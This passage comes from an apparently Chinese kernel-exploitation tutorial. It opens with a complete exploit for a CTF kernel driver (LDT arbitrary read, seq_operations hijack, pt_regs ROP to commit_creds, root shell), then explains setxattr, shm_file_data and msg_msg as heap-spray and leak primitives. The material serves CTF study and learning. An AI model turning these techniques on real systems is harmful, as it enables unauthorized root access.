 * corrupted ldt_struct->entries at addr. A child is then forked; it reads
 * its LDT with modify_ldt func 0 and sends the bytes back over a pipe into
 * res_buf (which must hold LDT_BUF_SIZE bytes).
 *
 * Changes from the original:
 *  - pipe() and fork() failures abort with a message. A failed fork used
 *    to fall into the parent branch and block forever on read().
 *  - The parent closes its write end and drains the pipe before reaping
 *    the child, so a pipe smaller than LDT_BUF_SIZE cannot deadlock, and
 *    short reads are handled.
 *  - The child leaves with _exit() so that stdio buffers inherited from
 *    the parent are not flushed a second time.
 *  - The unused user_desc local was dropped.
 */
void ldt_arbitrary_read(void *(*ldt_momdifier)(void *, size_t),
                        void *momdifier_args, size_t addr, char *res_buf) {
    static char buf[LDT_BUF_SIZE];
    int pipe_fd[2];
    pid_t child;
    size_t received = 0;

    /* modify the ldt_struct->entries to addr */
    ldt_momdifier(momdifier_args, addr);

    if (pipe(pipe_fd) < 0) {
        perror("[x] pipe");
        exit(EXIT_FAILURE);
    }

    child = fork();
    if (child < 0) {
        perror("[x] fork");
        exit(EXIT_FAILURE);
    }

    if (child == 0) {
        /* child: read the LDT and ship the bytes to the parent */
        syscall(SYS_modify_ldt, 0, buf, LDT_BUF_SIZE);
        write(pipe_fd[1], buf, LDT_BUF_SIZE);
        _exit(0);
    }

    /* parent: drop our write end so read() sees EOF once the child is done */
    close(pipe_fd[1]);
    while (received < LDT_BUF_SIZE) {
        ssize_t n = read(pipe_fd[0], res_buf + received,
                         LDT_BUF_SIZE - received);
        if (n <= 0) {
            break;
        }
        received += (size_t) n;
    }
    close(pipe_fd[0]);

    waitpid(child, NULL, 0);
}

/*
 * Scan kernel memory forward from search_addr in 0x8000-byte windows until
 * mem_finder reports a hit.
 *
 * Each window is fetched with ldt_arbitrary_read() and handed to
 * mem_finder(finder_args, window); a result of (size_t)-1 means "nothing
 * in this window". On a hit the function returns the finder's result
 * itself when ret_val is true, otherwise the result plus the address of
 * the window it was found in. The loop only ends on a hit.
 */
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void *, size_t),
                          void *momdifier_args, uint64_t search_addr,
                          size_t (*mem_finder)(void *, char *), void *finder_args, bool ret_val) {
    static char window[LDT_BUF_SIZE];

    for (;; search_addr += 0x8000) {
        ldt_arbitrary_read(ldt_momdifier, momdifier_args, search_addr, window);

        size_t hit = mem_finder(finder_args, window);
        if (hit == (size_t) -1) {
            continue;
        }

        if (ret_val) {
            return hit;
        }
        return hit + search_addr;
    }
}


/*
 * Heap-setup callback: leave the driver's note pointer dangling on a freed
 * object.
 *
 * cracker_args points to an int holding the slot index. The slot is
 * populated with chunk_add(), recorded as the note with chunk_set(), then
 * freed with chunk_delete(); the delete clears the slot but not the note.
 *
 * Always returns NULL. The original fell off the end of a function
 * declared to return void *.
 */
void *ldt_cracker(void *cracker_args) {
    int index = *(int *) cracker_args;

    chunk_add(index);
    chunk_set(index);
    chunk_delete(index);
    return NULL;
}

/*
 * Modifier callback: write page_offset_base into the first 8 bytes of the
 * object the dangling note points at, via chunk_edit().
 *
 * momdifier_args is unused. Always returns NULL. The original fell off the
 * end of a function declared to return void *.
 */
void *ldt_momdifier(void *momdifier_args, size_t page_offset_base) {
    (void) momdifier_args;
    chunk_edit(page_offset_base);
    return NULL;
}

/*
 * Search one LDT_BUF_SIZE-byte window for a kernel pointer that looks like
 * secondary_startup_64.
 *
 * A match is an 8-byte-step value greater than 0xffffffff81000000 whose
 * low 12 bits equal those of SECONDARY_STARTUP_64. finder_args is unused.
 *
 * Returns the matching value, or (size_t)-1 when the window has none.
 *
 * Values are loaded with memcpy() rather than by casting buf to size_t *:
 * buf is a plain char buffer, so the cast broke the effective-type rule
 * and assumed an alignment that char storage does not guarantee.
 */
size_t mem_finder(void *finder_args, char *buf) {
    (void) finder_args;

    for (size_t off = 0; off + sizeof(size_t) <= LDT_BUF_SIZE; off += 8) {
        size_t val;

        memcpy(&val, buf + off, sizeof(val));
        if (val > 0xffffffff81000000 && !((val ^ SECONDARY_STARTUP_64) & 0xFFF)) {
            return val;
        }
    }
    return -1;
}

/*
 * Exploit driver.
 *
 *  1. Pin to CPU 0 and open /dev/kernote.
 *  2. Brute-force page_offset_base through the dangling note + modify_ldt.
 *  3. Scan the direct mapping for a secondary_startup_64 pointer to get
 *     the kernel offset, then slide every gadget address by it.
 *  4. Free a second object, open /proc/self/stat so that a seq_operations
 *     can take its place, and overwrite its first 8 bytes (the start
 *     pointer) with the add-rsp gadget.
 *  5. Load the ROP chain into registers and issue read(seq_fd, rsp, 8),
 *     which calls seq_operations->start.
 *
 * Changes from the original: the program now stops when the device cannot
 * be opened, when the base guess fails, or when /proc/self/stat cannot be
 * opened; and the size_t values printed with %p are cast to void *, since
 * passing a size_t for %p is undefined.
 *
 * NOTE(review): the inline assembly is written in Intel syntax, so the
 * file presumably has to be built with -masm=intel - confirm.
 */
int main() {
    bind_core(0);
    kernote_fd = open("/dev/kernote", O_RDWR);
    if (kernote_fd < 0) {
        puts("[-] Failed to open kernote.");
        exit(EXIT_FAILURE);
    }

    size_t page_offset_base = ldt_guessing_direct_mapping_area(ldt_cracker, (int[]) {0}, ldt_momdifier, NULL, 0x4000000);
    if (page_offset_base == (size_t) -1) {
        /* The guessing routine reports failure with (size_t)-1. */
        puts("[-] Failed to find page_offset_base.");
        exit(EXIT_FAILURE);
    }
    printf("[+] page_offset_base: %p\n", (void *) page_offset_base);

    size_t kernel_offset = ldt_seeking_memory(ldt_momdifier, NULL, page_offset_base, mem_finder, NULL, true) - SECONDARY_STARTUP_64;
    printf("[+] kernel offset: %p\n", (void *) kernel_offset);

    /* Slide every hard-coded address by the leaked offset. */
    pop_rdi_ret += kernel_offset;
    init_cred += kernel_offset;
    commit_creds += kernel_offset;
    add_rsp_0x198_ret += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode += kernel_offset + 0x8;

    /* Free slot 1, let /proc/self/stat reclaim it, then patch the first 8 bytes. */
    ldt_cracker((int[]) {1});
    seq_fd = open("/proc/self/stat", O_RDONLY);
    if (seq_fd < 0) {
        puts("[-] Failed to open /proc/self/stat.");
        exit(EXIT_FAILURE);
    }
    chunk_edit(add_rsp_0x198_ret);

    /*
     * The register values end up in pt_regs on the kernel stack at syscall
     * entry; r15..r12 carry the ROP chain and the remaining registers hold
     * recognisable filler. rax = 0 selects read().
     */
    __asm__(
            "mov r15, pop_rdi_ret;"
            "mov r14, init_cred;"
            "mov r13, commit_creds;"
            "mov r12, swapgs_restore_regs_and_return_to_usermode;"
            "mov rbp, 0x5555555555555555;"
            "mov rbx, 0x6666666666666666;"
            "mov r11, 0x7777777777777777;"
            "mov r10, 0x8888888888888888;"
            "mov r9, 0x9999999999999999;"
            "mov r8, 0xaaaaaaaaaaaaaaaa;"
            "mov rcx, 0xbbbbbbbbbbbbbbbb;"
            "xor rax, rax;"
            "mov rdx, 8;"
            "mov rsi, rsp;"
            "mov rdi, seq_fd;"
            "syscall"
            );

    system("/bin/sh");

    return 0;
}

pt_regs 与系统调用相关

linux 系统调用的时候会把所有寄存器依次压入内核栈中形成 pt_regs 结构体,之后就继续执行内核代码。
pt_regs 结构体定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/*
 * Saved register frame. Members are listed from r15 (lowest) up to ss,
 * which sits just below the top of the stack page.
 */
struct pt_regs {
/*
* C ABI says these regs are callee-preserved. They aren't saved on kernel entry
* unless syscall needs a complete, fully filled "struct pt_regs".
*/
unsigned long r15;
unsigned long r14;
unsigned long r13;
unsigned long r12;
unsigned long rbp;
unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
unsigned long r11;
unsigned long r10;
unsigned long r9;
unsigned long r8;
unsigned long rax;
unsigned long rcx;
unsigned long rdx;
unsigned long rsi;
unsigned long rdi;
/*
* On syscall entry, this is syscall#. On CPU exception, this is error code.
* On hw interrupt, it's IRQ number:
*/
unsigned long orig_rax;
/* Return frame for iretq */
unsigned long rip;
unsigned long cs;
unsigned long eflags;
unsigned long rsp;
unsigned long ss;
/* top of stack page */
};

在内核栈上的结构如下:

由于系统调用前的寄存器的值是用户可控的,这就等于控制了内核栈底区域,也就可以在其中写入 ROP 。之后只需要控制程序执行流,利用一个 add rsp, val 的 gadget 将栈迁移到布置在 pt_regs 结构体上的 ROP 上就可以完成提权操作。

内核主线在 这个 commit 中为系统调用栈添加了一个偏移值,这意味着 pt_regs 与我们触发劫持内核执行流时的栈间偏移值不再是固定值,这个保护的开启需要 CONFIG_RANDOMIZE_KSTACK_OFFSET=y (默认开启)

1
2
3
4
5
6
7
8
9
10
11
12
diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
index 4efd39aacb9f2..7b2542b13ebd9 100644
--- a/arch/x86/entry/common.c
+++ b/arch/x86/entry/common.c
@@ -38,6 +38,7 @@
#ifdef CONFIG_X86_64
__visible noinstr void do_syscall_64(unsigned long nr, struct pt_regs *regs)
{
+ add_random_kstack_offset();
nr = syscall_enter_from_user_mode(regs, nr);

instrumentation_begin();

setxattr 相关

setxattr 并非一个内核结构体,而是一个系统调用,但在 kernel pwn 当中这同样是一个十分有用的系统调用,利用这个系统调用,我们可以进行内核空间中任意大小的 object 的分配。

任意大小 object 分配(GFP_KERNEL)& 释放

观察 setxattr 源码,发现如下调用链:

1
2
3
SYS_setxattr()
path_setxattr()
setxattr()

其中 setxattr 函数关键逻辑如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
size_t size, int flags)
{
//...
kvalue = kvmalloc(size, GFP_KERNEL);
if (!kvalue)
return -ENOMEM;
if (copy_from_user(kvalue, value, size)) {

//,..

kvfree(kvalue);

return error;
}

修改结构体

虽然 setxattr 可以分配任意大小的内核空间 object ,但是分配完之后就立即被释放了,起不到利用效果。因此这里需要配合 userfaultfd 将执行过程卡在 copy_from_user 处。

不过在 ctf 中的 kernel pwn 环境中由于受其它进程影响较小,可以直接用 setxattr 来 UAF 修改结构体的内容。

如果有其它同样大小结构体在不会修改相关字段的前提下可以一边用 setxattr 来修改结构体一边喷射结构体占用修改过的结构体,实现堆喷的效果。

simple_xattr (GFP_KERNEL)

该结构常用于存储 in-memory filesystems (例如 tmpfs)的扩展属性(xattrs - extended attribute),每个文件的 simple_xattr 用 list_head 链表存起来。分配函数是 simple_xattr_alloc(),用户可控 simple_xattr->value,分配大小是 kmalloc-32 到很大。

1
2
3
4
5
6
7
8
9
10
/* One extended attribute: a list node, the name, and size bytes of value stored inline. */
struct simple_xattr {
struct list_head list; /* list linkage (first member) */
char *name;
size_t size; /* presumably the length of value in bytes - confirm */
char value[]; /* flexible array member holding the attribute value */
};

/* Doubly linked list node: pointers to the next and previous nodes. */
struct list_head {
struct list_head *next, *prev;
};

缺点:simple_xattr 不能修改,当对它进行编辑时,会把旧的 simple_xattr 从链表 unlink ,然后分配新的 simple_xattr 并链接上去。所以通过伪造 size 或 next 指针,无法构造越界写或任意地址写。还有个问题就是非特权用户无法设置 simple_xattr,但是只要系统支持 user namespace 即可。

shm_file_data 与共享内存相关

进程间通信(Inter-Process Communication,IPC)即不同进程间的数据传递问题,在 Linux 当中有一种 IPC 技术名为共享内存,在用户态中我们可以通过 shmget、shmat、shmctl、shmdt 这四个系统调用操纵共享内存。

shm_file_data(kmalloc-32|GFP_KERNEL)

该结构体定义于 /ipc/shm.c 中,如下:

1
2
3
4
5
6
/*
 * Per-attach data of a shared memory file; do_shmat() allocates it and
 * stores it in file->private_data.
 */
struct shm_file_data {
int id;
struct ipc_namespace *ns; /* released with put_ipc_ns() in shm_release() */
struct file *file; /* released with fput() in shm_release() */
const struct vm_operations_struct *vm_ops;
};

分配:shmat 系统调用

我们知道使用 shmget 系统调用可以获得一个共享内存对象,随后要使用 shmat 系统调用将共享内存对象映射到进程的地址空间,在该系统调用中调用了 do_shmat() 函数,注意到如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
long do_shmat(int shmid, char __user *shmaddr, int shmflg,
ulong *raddr, unsigned long shmlba)
{
//...

struct shm_file_data *sfd;

//...

sfd = kzalloc(sizeof(*sfd), GFP_KERNEL);
//...
file->private_data = sfd;

即在调用 shmat 系统调用时会创建一个 shm_file_data 结构体,最后会存放在共享内存对象文件的 private_data 域中。

使用方法如下:

1
2
3
4
5
6
7
8
9
10
/* Create (or look up) a 0x1000-byte shared memory segment with key 114514. */
int shm_id = shmget(114514, 0x1000, SHM_R | SHM_W | IPC_CREAT);
if (shm_id < 0) {
    puts("[-] shmget failed.");
    exit(-1);
}

/*
 * Attach the segment. shmat() reports failure by returning (void *) -1,
 * not NULL or a "negative" pointer, so the original test shm_addr < 0
 * could never detect an error.
 */
char *shm_addr = shmat(shm_id, NULL, 0);
if (shm_addr == (void *) -1) {
    puts("[-] shmat failed.");
    exit(-1);
}

释放:shmdt 系统调用

我们知道使用 shmdt 系统调用用以断开与共享内存对象的连接,观察其源码,发现其会调用 ksys_shmdt() 函数,注意到如下调用链:

1
2
3
4
5
SYS_shmdt()
ksys_shmdt()
do_munmap()
remove_vma_list()
remove_vma()

其中有着这样一条代码:

1
2
3
4
5
6
7
8
static struct vm_area_struct *remove_vma(struct vm_area_struct *vma)
{
struct vm_area_struct *next = vma->vm_next;

might_sleep();
if (vma->vm_ops && vma->vm_ops->close)
vma->vm_ops->close(vma);
//...

在这里调用了该 vma 的 vm_ops 对应的 close 函数,我们将目光重新放回共享内存对应的 vma 的初始化的流程当中,在 shmat() 中注意到如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
long do_shmat(int shmid, char __user *shmaddr, int shmflg,
ulong *raddr, unsigned long shmlba)
{
//...
sfd = kzalloc(sizeof(*sfd), GFP_KERNEL);
if (!sfd) {
fput(base);
goto out_nattch;
}

file = alloc_file_clone(base, f_flags,
is_file_hugepages(base) ?
&shm_file_operations_huge :
&shm_file_operations);

在这里调用了 alloc_file_clone() 函数,其会调用 alloc_file() 函数将第三个参数赋值给新的 file 结构体的 f_op 域,在这里是 shm_file_operations 或 shm_file_operations_huge,定义于 /ipc/shm.c 中,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/*
 * File operations for shared memory files; do_shmat() selects this table
 * when the backing file is not a hugepage file. release is shm_release().
 */
static const struct file_operations shm_file_operations = {
.mmap = shm_mmap,
.fsync = shm_fsync,
.release = shm_release,
.get_unmapped_area = shm_get_unmapped_area,
.llseek = noop_llseek,
.fallocate = shm_fallocate,
};

/*
* shm_file_operations_huge is now identical to shm_file_operations,
* but we keep it distinct for the sake of is_file_shm_hugepages().
* do_shmat() selects this table when is_file_hugepages() is true for the
* backing file.
*/
static const struct file_operations shm_file_operations_huge = {
.mmap = shm_mmap,
.fsync = shm_fsync,
.release = shm_release,
.get_unmapped_area = shm_get_unmapped_area,
.llseek = noop_llseek,
.fallocate = shm_fallocate,
};

在这里对于关闭 shm 文件,对应的是 shm_release 函数,如下:

1
2
3
4
5
6
7
8
9
10
/*
 * Release handler of a shared memory file: drop the references held by
 * the file's shm_file_data, clear the file's pointer to it, and free it.
 * Always returns 0.
 */
static int shm_release(struct inode *ino, struct file *file)
{
	struct shm_file_data *data;

	data = shm_file_data(file);

	/* Drop what the shm_file_data holds before the structure goes away. */
	put_ipc_ns(data->ns);
	fput(data->file);

	shm_file_data(file) = NULL;
	kfree(data);

	return 0;
}

即当我们进行 shmdt 系统调用时便可以释放 shm_file_data 结构体。

1
2
3
/* Detach the shared memory mapping at shm_addr and report a failure. */
if (shmdt(shm_addr) < 0) {
puts("[-] shmdt failed.");
}

数据泄露

  • 内核 .text 段地址

    shm_file_data 的 ns 域和 vm_ops 域皆指向内核镜像中的静态对象(分别为 init_ipc_ns 与 shmem_vm_ops),若是我们能够泄露这两个指针便能计算出内核基址。

    • ns 字段通常指向 init_ipc_ns
    • vm_ops 字段通常指向 shmem_vm_ops
  • 内核线性映射区( direct mapping area)

    shm_file_data 的 file 域为一个 file 结构体,位于线性映射区中,若能泄露 file 域则同样能泄漏出内核的“堆上地址” 。

system V 消息队列:内核中的“菜单堆”

在 Linux kernel 中有着一组 system V 消息队列相关的系统调用:

  • msgget:创建一个消息队列
  • msgsnd:向指定消息队列发送消息
  • msgrcv:从指定消息队列接收消息

当我们创建一个消息队列时,在内核空间中会创建一个 msg_queue 结构体,其表示一个消息队列:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
 * one msg_queue structure for each present queue on the system
 *
 * q_messages is a list head; the article states that msg_msg objects are
 * chained onto the queue through it.
 */
struct msg_queue {
struct kern_ipc_perm q_perm;
time64_t q_stime; /* last msgsnd time */
time64_t q_rtime; /* last msgrcv time */
time64_t q_ctime; /* last change time */
unsigned long q_cbytes; /* current number of bytes on queue */
unsigned long q_qnum; /* number of messages in queue */
unsigned long q_qbytes; /* max number of bytes on queue */
struct pid *q_lspid; /* pid of last msgsnd */
struct pid *q_lrpid; /* last receive pid */

struct list_head q_messages;
struct list_head q_receivers;
struct list_head q_senders;
} __randomize_layout;

msg_msg & msg_msgseg:近乎任意大小的对象分配

当我们调用 msgsnd 系统调用在指定消息队列上发送一条指定大小的 message 时,在内核空间中会创建这样一个结构体:

1
2
3
4
5
6
7
8
9
/*
 * one msg_msg structure for each message
 *
 * Header of a message: the message text follows it in the same allocation,
 * and next starts the chain of msg_msgseg segments used for longer
 * messages.
 */
struct msg_msg {
struct list_head m_list; /* list linkage; do_msgrcv() unlinks the message via list_del() */
long m_type;
size_t m_ts; /* message text size */
struct msg_msgseg *next; /* first continuation segment, or NULL */
void *security;
/* the actual message follows immediately */
};

msg_queue 与 msg_msg 构成双向链表。

虽然 msg_queue 的大小基本上是固定的,但是 msg_msg 作为承载消息的本体其大小是可以随着消息大小的改变而进行变动的,去除掉 msg_msg 结构体本身的 0x30 字节的部分(或许可以称之为 header)剩余的部分都用来存放用户数据,因此内核分配的 object 的大小是跟随着我们发送的 message 的大小进行变动的

而当我们单次发送 大于【一个页面大小 - header size】 大小的消息时,内核会额外补充添加 msg_msgseg 结构体,其与 msg_msg 之间形成如下单向链表结构:

同样地,单个 msg_msgseg 的大小最大为一个页面大小,因此超出这个范围的消息内核会额外补充上更多的 msg_msgseg 结构体。

分配(GFP_KERNEL_ACCOUNT):msgsnd 系统调用

当我们在消息队列上发送一个 message 时,do_msgsnd 首先会调用 load_msg 将该 message 拷贝到内核中。注意这里对 msgsz 和 mtype 的检查。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static long do_msgsnd(int msqid, long mtype, void __user *mtext,
size_t msgsz, int msgflg)
{
struct msg_queue *msq;
struct msg_msg *msg;
int err;
struct ipc_namespace *ns;
DEFINE_WAKE_Q(wake_q);

ns = current->nsproxy->ipc_ns;

if (msgsz > ns->msg_ctlmax || (long) msgsz < 0 || msqid < 0)
return -EINVAL;
if (mtype < 1)
return -EINVAL;

msg = load_msg(mtext, msgsz);

//...

load_msg() 最终会调用到 alloc_msg() 分配所需的空间。

1
2
3
4
5
6
7
8
struct msg_msg *load_msg(const void __user *src, size_t len)
{
struct msg_msg *msg;
struct msg_msgseg *seg;
int err = -EFAULT;
size_t alen;

msg = alloc_msg(len);

alloc_msg 根据数据长度创建 msg_msg 以及 msg_msgseg 构成的单向链表。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/*
 * Allocate the kernel objects that will hold a message of len bytes.
 *
 * The first object is a struct msg_msg header followed by at most
 * DATALEN_MSG bytes of payload. Any remaining bytes are spread over
 * struct msg_msgseg objects of at most DATALEN_SEG payload bytes each,
 * chained through their next pointers starting at msg->next.
 *
 * Returns the head msg_msg, or NULL if any allocation fails (in which
 * case everything allocated so far is released through free_msg()).
 * Only next and security are initialised here; no payload is copied.
 */
static struct msg_msg *alloc_msg(size_t len)
{
struct msg_msg *msg;
struct msg_msgseg **pseg;
size_t alen;

/* Head object: header plus the first chunk of payload. */
alen = min(len, DATALEN_MSG);
msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
if (msg == NULL)
return NULL;

msg->next = NULL;
msg->security = NULL;

len -= alen;
/* pseg always points at the link field that the next segment must be stored in. */
pseg = &msg->next;
while (len > 0) {
struct msg_msgseg *seg;

cond_resched();

alen = min(len, DATALEN_SEG);
seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
if (seg == NULL)
goto out_err;
/* Append the new segment and keep the chain NULL-terminated. */
*pseg = seg;
seg->next = NULL;
pseg = &seg->next;
len -= alen;
}

return msg;

out_err:
/* The chain is NULL-terminated at every step, so free_msg() can walk the partial chain. */
free_msg(msg);
return NULL;
}

释放/读取:msgrcv

msgrcv 系统调用有如下调用链:

1
2
3
SYS_msgrcv()
ksys_msgrcv()
do_msgrcv()

其中 ksys_msgrcv 传入的是 do_msg_fill 函数指针。

1
2
3
4
5
long ksys_msgrcv(int msqid, struct msgbuf __user *msgp, size_t msgsz,
long msgtyp, int msgflg)
{
return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}

通过 msgrcv 系统调用我们可以从指定的消息队列中接收指定大小的消息,内核首先会调用 list_del() 将其从 msg_queue 的双向链表上 unlink,之后调用 msg_handler(即 do_msg_fill)函数处理消息,最后再调用 free_msg() 释放 msg_msg 单向链表上的所有消息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
//...
list_del(&msg->m_list);
//...
goto out_unlock0;
//...
out_unlock0:
ipc_unlock_object(&msq->q_perm);
wake_up_q(&wake_q);
out_unlock1:
rcu_read_unlock();
if (IS_ERR(msg)) {
free_copy(copy);
return PTR_ERR(msg);
}

bufsz = msg_handler(buf, msg, bufsz);
free_msg(msg);

return bufsz;
}

do_msg_fill 函数内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
 * Copy one received message out to the user-space msgbuf at dest.
 *
 * Writes msg->m_type into the mtype field, then copies at most bufsz
 * bytes of message text into mtext via store_msg().
 *
 * Returns the number of text bytes copied, or -EFAULT if either
 * user-space write fails.
 */
static long do_msg_fill(void __user *dest, struct msg_msg *msg, size_t bufsz)
{
struct msgbuf __user *msgp = dest;
size_t msgsz;

if (put_user(msg->m_type, &msgp->mtype))
return -EFAULT;

/* Copy length is min(bufsz, m_ts): m_ts is the only upper bound taken from the message. */
msgsz = (bufsz > msg->m_ts) ? msg->m_ts : bufsz;
if (store_msg(msgp->mtext, msg, msgsz))
return -EFAULT;
return msgsz;
}

在该函数中最终调用 store_msg() 完成消息向用户空间的拷贝,拷贝循环的终止条件是单向链表末尾的 NULL 指针,拷贝数据的长度主要依赖的是 msg_msg 的 m_ts 成员。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Copy len bytes of message text from a msg_msg chain to user space.
 *
 * The first min(len, DATALEN_MSG) bytes come from the memory directly
 * after the msg_msg header (msg + 1); the rest comes from the memory
 * after each msg_msgseg header (seg + 1), up to DATALEN_SEG bytes per
 * segment.
 *
 * Returns 0 on success and -1 if any copy_to_user() fails.
 */
int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
size_t alen;
struct msg_msgseg *seg;

alen = min(len, DATALEN_MSG);
if (copy_to_user(dest, msg + 1, alen))
return -1;

/*
 * The walk ends only when a NULL next pointer is reached; len merely
 * limits how many bytes are taken from each segment visited.
 */
for (seg = msg->next; seg != NULL; seg = seg->next) {
len -= alen;
dest = (char __user *)dest + alen;
alen = min(len, DATALEN_SEG);
if (copy_to_user(dest, seg + 1, alen))
return -1;
}
return 0;
}

free_msg 会沿着 msg_msg 的 next 指针遍历整条单向链表并依次释放。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
 * Release a message: the security hook first, then the head msg_msg,
 * then every msg_msgseg reachable through the next pointers.
 */
void free_msg(struct msg_msg *msg)
{
struct msg_msgseg *seg;

security_msg_msg_free(msg);

/* Read the first link before the head is freed. */
seg = msg->next;
kfree(msg);
while (seg != NULL) {
/* Same pattern per segment: fetch the successor, then free. */
struct msg_msgseg *tmp = seg->next;

cond_resched();
kfree(seg);
seg = tmp;
}
}

读取但不释放(MSG_COPY):msgrcv

当我们在调用 msgrcv 接收消息时,相应的 msg_msg 链表便会被释放,但阅读源码我们会发现,当我们在调用 msgrcv 时若设置了 MSG_COPY 标志位,则内核会将 message 拷贝一份后再拷贝到用户空间,原双向链表中的 message 并不会被 unlink,从而我们便可以多次重复地读取同一个 msg_msg 链条中的数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
//...

if (msgflg & MSG_COPY) {
if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
return -EINVAL;
copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); // 创建一个 msg_msg 结构 copy 用来存放拷贝的数据
if (IS_ERR(copy))
return PTR_ERR(copy);
}
//...

for (;;) {
//...
msg = find_msg(msq, &msgtyp, mode); // 根据 msgtyp 找到要拷贝的 msg_msg
if (!IS_ERR(msg)) {
/*
* Found a suitable message.
* Unlink it from the queue.
*/
if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) {
msg = ERR_PTR(-E2BIG);
goto out_unlock0;
}
/*
* If we are copying, then do not unlink message and do
* not update queue parameters.
*/
if (msgflg & MSG_COPY) {
msg = copy_msg(msg, copy); // 将 msg 数据拷贝到 copy 中
goto out_unlock0;
}

list_del(&msg->m_list);

这里需要注意的是当我们使用 MSG_COPY 标志位进行数据泄露时,其寻找消息的逻辑并非像普通读取消息那样比对 msgtyp, 而是以 msgtyp 作为读取的消息序号(即 msgtyp == 0 表示读取第 0 条消息,以此类推)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/*
 * Walk msq->q_messages and pick the message selected by *msgtyp/mode.
 *
 * Only messages accepted by both testmsg() and the
 * security_msg_queue_msgrcv() hook are considered. For those:
 *  - SEARCH_LESSEQUAL: remember the message and lower *msgtyp to
 *    m_type - 1, then keep scanning (a message of type 1 is returned
 *    immediately through the final else branch);
 *  - SEARCH_NUMBER: return the message whose position among the
 *    accepted messages equals *msgtyp;
 *  - any other mode: return the first accepted message.
 *
 * Returns the chosen message, or ERR_PTR(-EAGAIN) if none qualifies.
 */
static struct msg_msg *find_msg(struct msg_queue *msq, long *msgtyp, int mode)
{
struct msg_msg *msg, *found = NULL;
long count = 0;

list_for_each_entry(msg, &msq->q_messages, m_list) {
if (testmsg(msg, *msgtyp, mode) &&
!security_msg_queue_msgrcv(&msq->q_perm, msg, current,
*msgtyp, mode)) {
if (mode == SEARCH_LESSEQUAL && msg->m_type != 1) {
*msgtyp = msg->m_type - 1;
found = msg;
} else if (mode == SEARCH_NUMBER) {// branch taken for MSG_COPY
/* Here *msgtyp is an index into the queue, not a message type. */
if (*msgtyp == count)
return msg;
} else
return msg;
/* Counts accepted messages that were not returned. */
count++;
}
}

return found ?: ERR_PTR(-EAGAIN);
}

static inline int convert_mode(long *msgtyp, int msgflg)
{
if (msgflg & MSG_COPY)
return SEARCH_NUMBER;
...
}

mode = convert_mode(&msgtyp, msgflg);
...
msg = find_msg(msq, &msgtyp, mode);

同样的,对于 MSG_COPY 而言,数据的拷贝使用的是 copy_msg() 函数,其会比对源消息的 m_ts 是否大于存储拷贝的消息的 m_ts ,若大于则拷贝失败,而后者则为我们传入 msgrcv() 的 msgsz,因此若我们仅读取单条消息,则需要保证 msgsz 不小于源消息的 m_ts(最简单的做法是令两者相等)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
 * Duplicate the contents of src into the pre-allocated chain dst.
 *
 * Fails with ERR_PTR(-EINVAL) when src->m_ts is larger than dst->m_ts.
 * Otherwise the payload is copied chunk by chunk (DATALEN_MSG bytes
 * from the head, DATALEN_SEG bytes per segment), m_type and m_ts are
 * taken over from src, and dst is returned.
 */
struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
struct msg_msgseg *dst_pseg, *src_pseg;
size_t len = src->m_ts;
size_t alen;

if (src->m_ts > dst->m_ts)// size check: the source must fit into the destination
return ERR_PTR(-EINVAL);

alen = min(len, DATALEN_MSG);
memcpy(dst + 1, src + 1, alen);

/* Both chains are advanced in lock-step, but only the source pointer is tested. */
for (dst_pseg = dst->next, src_pseg = src->next;
src_pseg != NULL;// the walk stops at the end of the source chain
dst_pseg = dst_pseg->next, src_pseg = src_pseg->next) {

len -= alen;
alen = min(len, DATALEN_SEG);
memcpy(dst_pseg + 1, src_pseg + 1, alen);
}

dst->m_type = src->m_type;
dst->m_ts = src->m_ts;

return dst;
}

数据泄露

  • 越界数据读取
    在拷贝数据时对长度的判断主要依靠的是 msg_msg->m_ts,我们不难想到的是:若是我们能够控制一个 msg_msg 的 header,将其 m_ts 成员改为一个较大的数,我们就能够越界读取出最多将近一张内存页大小的数据
  • 任意地址读
    对于大于一张内存页的数据而言内核会在 msg_msg 的基础上再补充加上 msg_msgseg 结构体,形成一个单向链表,我们不难想到的是:若是我们能够同时劫持 msg_msg->m_ts 与 msg_msg->next,我们便能够完成内核空间中的任意地址读
